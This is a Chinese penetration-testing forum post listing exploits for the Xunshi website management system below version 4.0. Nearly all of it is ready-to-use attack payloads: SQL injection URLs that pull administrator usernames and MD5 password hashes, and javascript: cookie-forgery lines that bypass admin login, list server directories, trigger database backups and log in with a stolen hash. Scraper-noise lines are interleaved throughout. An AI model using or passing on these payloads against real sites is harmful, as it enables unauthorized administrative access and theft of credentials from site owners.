中国网络渗透测试联盟
标题:
讯时网站管理系统4.0以下漏洞
[打印本页]
作者:
admin
时间:
2016-5-11 14:55
标题:
讯时网站管理系统4.0以下漏洞
一、注入
# \; B9 X5 }7 a4 r' _) w1 `4 _5 _1 I H
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
7 ~% O3 A8 D, b$ H9 U
. ]( Q9 B2 `3 n8 t0 f" [: \2 ?
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
7 y2 ?3 h! J4 m- u9 O% a4 d3 W& C
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
. S' c5 Q. y- f. n x2 G; z
可得到用户名和MD5加密码的密码。
[- L8 |2 e2 Z g$ k4 N
" R; S6 ?* C. h+ e3 y, [% Y' j$ q
二、cookies欺骗
! }' p) {' H! ^, y- d
" C/ a/ }, \; H- C( \" H7 E8 G8 ~9 \
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
7 s; M: t$ |4 d& M7 ]
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
3 u+ N, `( h+ f3 V4 N+ o* O" B
" c9 z0 N) c6 m+ I* ?! f) f- d
2、列目录.
z8 m: @& h3 L9 z+ Q! e/ G
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
: n# {9 J: T5 {( D2 B! W$ Y' z. x
( N! i& Z% L' y* Y& N3 [/ M
3、数据库备份(适用性好像比较低.)
9 l z) b3 Y" H; [# `' C B6 c
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
& [( H) _8 S5 A3 H
4 O- r! [& r# F! `; d
4、得到MD5密码解不了密进后台方法
4 H; V: j p* v6 v! v
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
U: [8 P, I- x0 n* F7 h$ i! M
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2